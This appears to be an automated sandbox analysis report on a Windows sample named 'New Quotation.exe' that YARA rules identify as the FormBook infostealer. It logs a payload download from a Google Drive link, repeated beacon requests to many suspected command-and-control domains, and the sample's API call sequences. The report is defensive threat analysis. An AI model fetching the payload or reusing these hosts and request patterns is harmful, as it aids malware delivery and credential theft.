      Source: explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/white-house-chaos-as-video-shows-joe-biden-aides-stop-report
      Source: explorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
      Source: explorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
      Source: explorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
      Source: explorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: unknownDNS traffic detected: queries for: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1pkJqJeYBgsKa6ou6xByI4DdGT3NGirLb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/do4pmedip159iep2454spmaehd0b8seb/1654840275000/03850461078914778055/*/1pkJqJeYBgsKa6ou6xByI4DdGT3NGirLb?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-as-docs.googleusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=9EsqhgYJ7gNCuyDVUAbmGxK1wm9jM9gbBQ+iilDrWSOhprOSHc5xNSdxhhACbSLapwdF HTTP/1.1Host: www.animehub.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=8QcX/9a8ci5Vn1nUgpALxBO0i5LJh4pOXEYLQ5+l8i6jeOxjgCEcajHz4AJyUtveARY+&6lbL=qTfTz0 HTTP/1.1Host: www.somosnuecru.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=blgq+MwijlPLtn18EK/mFFgLQ7saUAegRg4nsKXdDvXqvzc0FmI2dz5pRjRE3XI8Zh+s HTTP/1.1Host: www.cardviews.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=C4QtL123UqrFY0ZIvsissWy0gTwQZvavuGdAMd62WneJYeLezb4bPLeN5mqTMt96tJ/I HTTP/1.1Host: www.belajarakuntansipajak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=hAb1bfA3kdRzRDaFO/Xjxrg/eigTyfVAv6myO+nVVHigx1EEc3JcIrberUsYxkjlMdL+&6lbL=qTfTz0 HTTP/1.1Host: www.cocodetteexciple.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=idqIzuqk2a5vjoGSbf9Bcwe0DWiZK+YeMoSyFHNnMaplLV0sCAEI7n55HlOgc8kmWb4X HTTP/1.1Host: www.outletgals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=XJueD6+RsCamebg+m2IDevgDgX6JK6+fg1om2YuoQAjiRITTUmGQ1TK81l5L26OUxDMt&6lbL=qTfTz0 HTTP/1.1Host: www.bkbc.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=Le51HqdCnUjRonUOENSF5PHY57eFe7/AO9vFjh8TXkRU4Y1PyjhZUj1LAkJkXoaSSV0M HTTP/1.1Host: www.soussecloud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1Host: www.puude.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=cnYzLO/iOmLQ80nbybEBKd6xv0BZ3jX95SMYu5eAQoFQzMXmCHJOFJgiGACm/n2x6SPU HTTP/1.1Host: www.rlxijvrd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=ZOJEaTbg68I2C/h4CsFFsOVO6bUFraiXKSxh6HANJbUJoISOJ9GPYTEDhfBXlhmSduAT&6lbL=qTfTz0 HTTP/1.1Host: www.lcm-brokers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=MpN0czAuQ6QXUx2sg2pWHBUGWBvsIkeMjItV5tnwLHMMLUdJVGF+gg01BF91m3Q+VFle HTTP/1.1Host: www.solaksa.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=WTCZorkujDQqRjcxlgclBW8LL1l4Q4yZC6MlAjn7yJTWeUkxqEHcvOf8DmefZeR6VxbM&6lbL=qTfTz0 HTTP/1.1Host: www.hanju2020.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?6lbL=qTfTz0&Djf=/K5hgtIqUus/DloXEMxkOj6GgPGVswIXrDjH+XzUkbkk6TDv4WNyBCGfY3zU+FC2J3jS HTTP/1.1Host: www.ranabroimpexp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=j/Ps+a/VuX4QoBvcMreOK2UI1STzAixbxZBALrwc64bjPCb9njwh7+nFlquJ6zY9vl55&6lbL=qTfTz0 HTTP/1.1Host: www.onlinesinavsistemi.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=iEw+cJwvtv+bQOCPj3F7KZu21Rs9fexzItYbFNxodrXSDd9r0rFLMIC1b94eFbixOM9K&YPcp=8p-DO HTTP/1.1Host: www.lax0.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /a2c8/?Djf=AplE9LD72/xgVAg7E91FKL+rPo1U0v89Attzn1Fzu6gMFI5vxyD2OErKmqoT1DuyJNiH&YPcp=8p-DO HTTP/1.1Host: www.tuinkunst.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.11.20:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.65:443 -> 192.168.11.20:49765 version: TLS 1.2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004056DE

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.53994922758.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000000.49433524155.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.49634007280.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.49659534027.000000001D440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000011.00000002.53994922758.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000011.00000002.53994922758.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000000.49433524155.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000000.49433524155.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.49634007280.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.49634007280.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.49659534027.000000001D440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.49659534027.000000001D440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: New Quotation.exe
      Source: New Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000011.00000002.53994922758.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000011.00000002.53994922758.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000000.49433524155.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000000.49433524155.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.49634007280.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.49634007280.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.49659534027.000000001D440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.49659534027.000000001D440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_0040755C1_2_0040755C
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_00406D851_2_00406D85
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_71091BFF1_2_71091BFF
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0D697_2_1D7E0D69
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87FDF47_2_1D87FDF4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DAD007_2_1D7DAD00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E9DD07_2_1D7E9DD0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89FD277_2_1D89FD27
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D897D4C7_2_1D897D4C
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7F2DB07_2_1D7F2DB0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C607_2_1D7E3C60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D879C987_2_1D879C98
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EAC207_2_1D7EAC20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8AACEB7_2_1D8AACEB
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D867CE87_2_1D867CE8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D0C127_2_1D7D0C12
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FFCE07_2_1D7FFCE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7F8CDF7_2_1D7F8CDF
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88EC4C7_2_1D88EC4C
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D896C697_2_1D896C69
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89EC607_2_1D89EC60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89EFBF7_2_1D89EFBF
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D891FC67_2_1D891FC6
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7ECF007_2_1D7ECF00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE07_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89FF637_2_1D89FF63
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D890EAD7_2_1D890EAD
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D899ED27_2_1D899ED2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D2EE87_2_1D7D2EE8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D822E487_2_1D822E48
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E1EB27_2_1D7E1EB2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D800E507_2_1D800E50
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89E9A67_2_1D89E9A6
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8259C07_2_1D8259C0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DE9A07_2_1D7DE9A0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E98707_2_1D7E9870
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FB8707_2_1D7FB870
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C68687_2_1D7C6868
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8598B27_2_1D8598B2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8918DA7_2_1D8918DA
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8978F37_2_1D8978F3
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E38007_2_1D7E3800
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80E8107_2_1D80E810
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8808357_2_1D880835
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E28C07_2_1D7E28C0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8558707_2_1D855870
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89F8727_2_1D89F872
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7F68827_2_1D7F6882
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D854BC07_2_1D854BC0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0B107_2_1D7E0B10
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D81DB197_2_1D81DB19
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89FB2E7_2_1D89FB2E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89FA897_2_1D89FA89
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89CA137_2_1D89CA13
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89EA5B7_2_1D89EA5B
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FFAA07_2_1D7FFAA0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89F5C97_2_1D89F5C9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8975C67_2_1D8975C6
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8AA5267_2_1D8AA526
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84D4807_2_1D84D480
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E04457_2_1D7E0445
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E27607_2_1D7E2760
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EA7607_2_1D7EA760
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89A6C07_2_1D89A6C0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8536EC7_2_1D8536EC
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89F6F67_2_1D89F6F6
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FC6007_2_1D7FC600
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DC6E07_2_1D7DC6E0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87D62C7_2_1D87D62C
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88D6467_2_1D88D646
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8046707_2_1D804670
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E06807_2_1D7E0680
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CF1137_2_1D7CF113
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A010E7_2_1D8A010E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FB1E07_2_1D7FB1E0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87D1307_2_1D87D130
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E51C07_2_1D7E51C0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D82717A7_2_1D82717A
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D81508C7_2_1D81508C
